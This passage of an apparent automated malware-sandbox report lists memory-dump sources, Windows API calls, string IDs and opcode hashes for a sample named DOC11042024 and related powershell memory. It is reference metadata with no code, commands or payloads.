                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                              • String ID:
                                                                              • API String ID: 1404258612-0
                                                                              • Opcode ID: aa5555bfc8295b58fd81a5818e23c2b5cd16578b7fef26a9570da450fab9efcc
                                                                              • Instruction ID: 61e4eed2658209ad14430a75dcf5faad83cf27f194a0033f35d66832804e5a0d
                                                                              • Opcode Fuzzy Hash: aa5555bfc8295b58fd81a5818e23c2b5cd16578b7fef26a9570da450fab9efcc
                                                                              • Instruction Fuzzy Hash: BE113375A00109BFDB00AFA6CD45CAEBBB9EF44344F10807AF501E62A1E7788E50DB68
                                                                              APIs
                                                                              • IsWindowVisible.USER32(?), ref: 004050F9
                                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 0040514A
                                                                                • Part of subcall function 0040413D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040414F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                              • String ID:
                                                                              • API String ID: 3748168415-3916222277
                                                                              APIs
                                                                              • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75922EE0,004037B8,75923420,004035E3,?), ref: 004037FB
                                                                              • GlobalFree.KERNEL32(?), ref: 00403802
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004037F3
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: Free$GlobalLibrary
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                              • API String ID: 1100898210-823278215
                                                                              APIs
                                                                              • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402DBE,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 0040595C
                                                                              • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402DBE,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 0040596C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: CharPrevlstrlen
                                                                              • String ID: C:\Users\user\Desktop
                                                                              • API String ID: 2709904686-1246513382
                                                                              APIs
                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00405CAD,00000000,[Rename]), ref: 00405AA0
                                                                              • lstrcmpiA.KERNEL32(?,?), ref: 00405AB8
                                                                              • CharNextA.USER32(?,?,00000000,00405CAD,00000000,[Rename]), ref: 00405AC9
                                                                              • lstrlenA.KERNEL32(?,?,00000000,00405CAD,00000000,[Rename]), ref: 00405AD2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                              • String ID:
                                                                              • API String ID: 190613189-0
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2328940087.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_6710000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq
                                                                              • API String ID: 0-1426913307
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2345303997.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_9010000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$4'jq$4'jq$4'jq$tPjq$tPjq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq
                                                                              • API String ID: 0-2603203684
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq
                                                                              • API String ID: 0-93237521
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$tPjq$tPjq$x.xk$-xk
                                                                              • API String ID: 0-4060372604
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$4'jq$4'jq$4'jq$x.xk$x.xk$-xk
                                                                              • API String ID: 0-3165302621
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$4'jq$4'jq$4'jq$tPjq$tPjq
                                                                              • API String ID: 0-1582633876
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$4'jq$$jq$$jq$$jq
                                                                              • API String ID: 0-103809679
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$4'jq$x.xk$-xk
                                                                              • API String ID: 0-1925243054
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$4'jq$4'jq$4'jq
                                                                              • API String ID: 0-4000621977
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$E$x.xk$-xk
                                                                              • API String ID: 0-1939656691
                                                                              • Opcode ID: 16e2b8d0c015393b3b3dd8b273b1ccb315719488143a2fe224129a57309e037d
                                                                              • Instruction ID: 9b142e3b383f7d2e09298bd8b670b844ff7569e4254aa2ffbf30d8acc65b379d
                                                                              • Opcode Fuzzy Hash: 16e2b8d0c015393b3b3dd8b273b1ccb315719488143a2fe224129a57309e037d
                                                                              • Instruction Fuzzy Hash: AB229EB4A102159FD760DB28CA40FA9BBB2FB84714F14C494E9099F391DB72ED85CFA1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2345303997.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_9010000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$4'jq$$jq$$jq
                                                                              • API String ID: 0-1496060811
                                                                              • Opcode ID: bf44e1811ad410ee0f49dc76532035ff97f181f2c773a64e1d1eee17d5601f83
                                                                              • Instruction ID: d11577504e3e7cc7cfd13efbbaf11581d7c8c9b941075843f20dd5e89c546819
                                                                              • Opcode Fuzzy Hash: bf44e1811ad410ee0f49dc76532035ff97f181f2c773a64e1d1eee17d5601f83
                                                                              • Instruction Fuzzy Hash: 2B215B32B042058FDB699A6CE8511AAF7D6FF95220F108D7FD96687186DB31C81AC352
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$x.xk$-xk
                                                                              • API String ID: 0-2266635699
                                                                              • Opcode ID: 6ddf52a3e9b14c47271e2532bf020aa4f9c3ad7bc5dd5110114aba701e6794f4
                                                                              • Instruction ID: 9365e0dd1fff2e7721e524898108f54437d410400236a46764a8551722d58611
                                                                              • Opcode Fuzzy Hash: 6ddf52a3e9b14c47271e2532bf020aa4f9c3ad7bc5dd5110114aba701e6794f4
                                                                              • Instruction Fuzzy Hash: FC528CB0B102159FD760DB28CA80FA9BBB2EB84710F14C495E9099F391DB72ED85CF91
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$x.xk$-xk
                                                                              • API String ID: 0-2266635699
                                                                              • Opcode ID: 9079b2313850d3eb4df522e11bb498870de1eda27728ed247d588aef01db2d54
                                                                              • Instruction ID: 4fe4d616dcfcfd077f2c97298150109f7bc677d9a8ebdbd299e4d8ca9feac2ef
                                                                              • Opcode Fuzzy Hash: 9079b2313850d3eb4df522e11bb498870de1eda27728ed247d588aef01db2d54
                                                                              • Instruction Fuzzy Hash: 094261B0B102149FD764DB58CE51FAABBB2EB85310F508494E9096F391CB76ED81CF91
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$x.xk$-xk
                                                                              • API String ID: 0-2266635699
                                                                              • Opcode ID: 9f96b6326e521fb62b8bf7040dfc47dcdbb6034cbbbca7f5f64fb44c77fd2aa6
                                                                              • Instruction ID: 87a8d3f0becd089e4b93a294bebecbaee556e1a46e69b0b809dfd24f09d5ebcc
                                                                              • Opcode Fuzzy Hash: 9f96b6326e521fb62b8bf7040dfc47dcdbb6034cbbbca7f5f64fb44c77fd2aa6
                                                                              • Instruction Fuzzy Hash: D61282B0B102149FD764DB58CE91FAABBB2EB85310F508494E9096F391CB76ED81CF91
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $jq$$jq$$jq
                                                                              • API String ID: 0-3696375380
                                                                              • Opcode ID: 3189bf6debdd22937a14ac94f1ecebcaa90d61e978b1502e36e63046c31e7bc8
                                                                              • Instruction ID: c1c1ff86f83f05616367dca73ab3b104527494f2054e90f139c72a3e2d101001
                                                                              • Opcode Fuzzy Hash: 3189bf6debdd22937a14ac94f1ecebcaa90d61e978b1502e36e63046c31e7bc8
                                                                              • Instruction Fuzzy Hash: 562177F133074B9BDB34456A8950B77AA9ADBC1711F34882AED09CF385DD76C8148360
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$4'jq
                                                                              • API String ID: 0-1204115232
                                                                              • Opcode ID: 49a870fdb09dd9980d75ed605610cbc89b75fe3c30e10d173a724988599b6ae7
                                                                              • Instruction ID: 6d0840503312450220c0b8788707087dfe928784a34457799dd22e3354d05793
                                                                              • Opcode Fuzzy Hash: 49a870fdb09dd9980d75ed605610cbc89b75fe3c30e10d173a724988599b6ae7
                                                                              • Instruction Fuzzy Hash: 42229EB0A10285CFDB24DF58C591FAABBB2EB85714F1484A9E9095F352CB72EC41CF91
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$x.xk
                                                                              • API String ID: 0-473956995
                                                                              • Opcode ID: 9f24abbe92a28efaf91e48b3358874bf7e2ce69416e341df38d7628fe760b679
                                                                              • Instruction ID: 86ebe0ad1d93c70f42fcc625ff7c4ac39666083542d98a39ced50006410a652e
                                                                              • Opcode Fuzzy Hash: 9f24abbe92a28efaf91e48b3358874bf7e2ce69416e341df38d7628fe760b679
                                                                              • Instruction Fuzzy Hash: D7124CB0B20215CFDB60CB54CA50BAABBB2FB85314F5084E5E9096B351CB76ED85CF91
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: tPjq$tPjq
                                                                              • API String ID: 0-4117293638
                                                                              • Opcode ID: 09b9e5b9d0f9641708d9409b9147e099b7afac0e5a0a242e8ba297ec4ac7f4da
                                                                              • Instruction ID: 465201b7d93b2ddd9bdb3cfdf966a8d4961288f9cc79f98405a69acf2e69c350
                                                                              • Opcode Fuzzy Hash: 09b9e5b9d0f9641708d9409b9147e099b7afac0e5a0a242e8ba297ec4ac7f4da
                                                                              • Instruction Fuzzy Hash: 8F5149F17643569FCB318AA98810B6BBBA7AF81311F14C87BD549CB292CA75C844C7B1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $jq$$jq
                                                                              • API String ID: 0-3720491408
                                                                              • Opcode ID: 1e9eba6427fdb2de3b8886a3b1d4a40d166e4a606c2c75afed1a134ca737b65e
                                                                              • Instruction ID: c10bf362d7b1ec63bfc508a244f59eef625ee150a35e44cf958eb0b549f09ff6
                                                                              • Opcode Fuzzy Hash: 1e9eba6427fdb2de3b8886a3b1d4a40d166e4a606c2c75afed1a134ca737b65e
                                                                              • Instruction Fuzzy Hash: E52146F13287CA5FDB3106354D517A23F75CF82600F284497ED44DF292E96A9814C331
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: x.xk
                                                                              • API String ID: 0-2157606827
                                                                              • Opcode ID: f9b2fb626a8e2030cfb955f0024e515b1594129983adf5739369786233ba851c
                                                                              • Instruction ID: 1d6e4e3f7ab1254faf7ce9a290d75443c54fb4922b4d2914991f73ab451bd027
                                                                              • Opcode Fuzzy Hash: f9b2fb626a8e2030cfb955f0024e515b1594129983adf5739369786233ba851c
                                                                              • Instruction Fuzzy Hash: D231D270B501009FD724E768CA55BAE7AA3EFC4354F208864E9016F395CE769D46CBE1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2328940087.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_6710000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq
                                                                              • API String ID: 0-3676250632
                                                                              • Opcode ID: 8070ead0bb2c7c3f5dd469f0efaf4bea63f7f669a06cf6180328d535598ed84d
                                                                              • Instruction ID: 252d57a680d97991a3590e0cff1198ab67b05a70f0d793b38391128481567e75
                                                                              • Opcode Fuzzy Hash: 8070ead0bb2c7c3f5dd469f0efaf4bea63f7f669a06cf6180328d535598ed84d
                                                                              • Instruction Fuzzy Hash: E6F0F4303843402BD718A775AC50BAF6B57EFC0610F14097CD5065F3E6CD60AC098654
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2328940087.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_6710000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq
                                                                              • API String ID: 0-3676250632
                                                                              • Opcode ID: 440e1a5b02c797066ce75997b6c3f681582a05ee113c12a25485ce3d349306ac
                                                                              • Instruction ID: bc9b7d657ca819920628ccfd4b5097a2ecabf18046ce74424a62a8fac7ce8a03
                                                                              • Opcode Fuzzy Hash: 440e1a5b02c797066ce75997b6c3f681582a05ee113c12a25485ce3d349306ac
                                                                              • Instruction Fuzzy Hash: 81F0F6303443002BD21CAA76AC50F6F7B5BEFC5610F54087CE5065B3DACD60AC098794
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2328940087.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_6710000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq
                                                                              • API String ID: 0-3676250632
                                                                              • Opcode ID: 78e89060b1cb2863cec3c4d21d95c6278c2e7dcef3e86ea1a5bf39013362ed24
                                                                              • Instruction ID: ea088e092ea8e99c91577fc4af9875b7044942403b2ab30199d4494bc5a6b9f4
                                                                              • Opcode Fuzzy Hash: 78e89060b1cb2863cec3c4d21d95c6278c2e7dcef3e86ea1a5bf39013362ed24
                                                                              • Instruction Fuzzy Hash: 31F0F0303443002BD21CAA66AC50F6F7A5BEFC4610F60087CE5065B3DACEA0AC098698
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2345320958.0000000009020000.00000040.00000800.00020000.00000000.sdmp, Offset: 09020000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_9020000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a33abf70441d0a353179728468e5b749b7b3796c061a0f1234791073aa6fda62
                                                                              • Instruction ID: 6a9cbed18e75109d3c2a96e9c7646843a497a083c75317d857f19d47b20c0a5f
                                                                              • Opcode Fuzzy Hash: a33abf70441d0a353179728468e5b749b7b3796c061a0f1234791073aa6fda62
                                                                              • Instruction Fuzzy Hash: E4022974A01219DFDB15CF98D984AAEBBF6FF88310F248559E805AB365C731ED81CB90
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2328940087.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_6710000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2771617570b711e07d4f91eba7f4f9bb552e4eefad8f6a5dd70608a118ff8663
                                                                              • Instruction ID: 33e7f49b2e9c26984478abc232c7119c8baaf38a1990ef7b49d005a298c88240
                                                                              • Opcode Fuzzy Hash: 2771617570b711e07d4f91eba7f4f9bb552e4eefad8f6a5dd70608a118ff8663
                                                                              • Instruction Fuzzy Hash: F2A18F35E002489FDB58DFA8D544AADBBB6FF84310F11855AE406AF365DB34ED89CB80
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 71934422142b31fd315d407119d4098f59a798fe26c1206208289c97dffbcb3b
                                                                              • Instruction ID: 18a4375dbbb370b2700d0a7b6520a15407b9e6d7cba8bf57f01e66c31cb07fb8
                                                                              • Opcode Fuzzy Hash: 71934422142b31fd315d407119d4098f59a798fe26c1206208289c97dffbcb3b
                                                                              • Instruction Fuzzy Hash: 1F713BF1730216DFCB209E7AC94126ABFE5EFC6210F14847AD809DB281EB31D955CBA1
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2345303997.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_9010000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 663dec3f1dcc70b819afe2cfd815da8fe111a47a2dd28775eb95566a9aacb57a
                                                                              • Instruction ID: aba17adb0f806bf41d1a2d48560d25f4dd18d90b1b4e9a90367413abd79fc938
                                                                              • Opcode Fuzzy Hash: 663dec3f1dcc70b819afe2cfd815da8fe111a47a2dd28775eb95566a9aacb57a
                                                                              • Instruction Fuzzy Hash: DD810B34A00204DFCB64CF59C595AAEBBF2BF88314F15C8A9E845AB755C732E981CF60
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2345303997.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_9010000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: dbbd8f6009eb6bb23bc8311b126c4da7c3dd1470bf3e4911b0dbef6cdb10afd7
                                                                              • Instruction ID: a2fc2b2b280c1269f62232cca336f808862810f66661382aff248c9fa5bae419
                                                                              • Opcode Fuzzy Hash: dbbd8f6009eb6bb23bc8311b126c4da7c3dd1470bf3e4911b0dbef6cdb10afd7
                                                                              • Instruction Fuzzy Hash: 4B81FB34A00204DFCB64CF59C595AAEBBF2BF88314F15C8A9E845AB755C732E981CF60
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2328940087.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_6710000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 04f328ab0de2d038502928453528892f08dd69b1be5f83f9b1e49454289e4073
                                                                              • Instruction ID: 4b735eec85c76f13b108273bd25ee5d9842066d0b6f818668d4083b5a939bd2f
                                                                              • Opcode Fuzzy Hash: 04f328ab0de2d038502928453528892f08dd69b1be5f83f9b1e49454289e4073
                                                                              • Instruction Fuzzy Hash: 32715F30E00209DFDB58DFA9D444BADBBF6BF88304F14856AD411AB364DB35AD46CB50
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2328940087.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_6710000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: dfc322e8a079f75b97c09926b787082e14c76c4e5c5b9b624d679d75dc8de7f3
                                                                              • Instruction ID: aac372bfc7a84a6d01ab539bd7ea43fac6f2bf0361b8d5ca26508636abc04489
                                                                              • Opcode Fuzzy Hash: dfc322e8a079f75b97c09926b787082e14c76c4e5c5b9b624d679d75dc8de7f3
                                                                              • Instruction Fuzzy Hash: BA617E30A00209CFCB28DF68C484AEDBBF6FF85314F14856AD4069B755DB75AD46CB90
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2345320958.0000000009020000.00000040.00000800.00020000.00000000.sdmp, Offset: 09020000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_9020000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 043b3f14f8fa930550604aefb626fc3e11bbdaf0635eba19b809e1e6ab9752dd
                                                                              • Instruction ID: 5b75faf4f59e92b22a6365e32d89d4050ddcd0bfa47697d3a76933e74eb3b766
                                                                              • Opcode Fuzzy Hash: 043b3f14f8fa930550604aefb626fc3e11bbdaf0635eba19b809e1e6ab9752dd
                                                                              • Instruction Fuzzy Hash: 2B514030A053949FCB06CF6CC8A09AEBFB1FF4A314B154596E454EB2B6C335AC45CB95
                                                                              Memory Dump Source
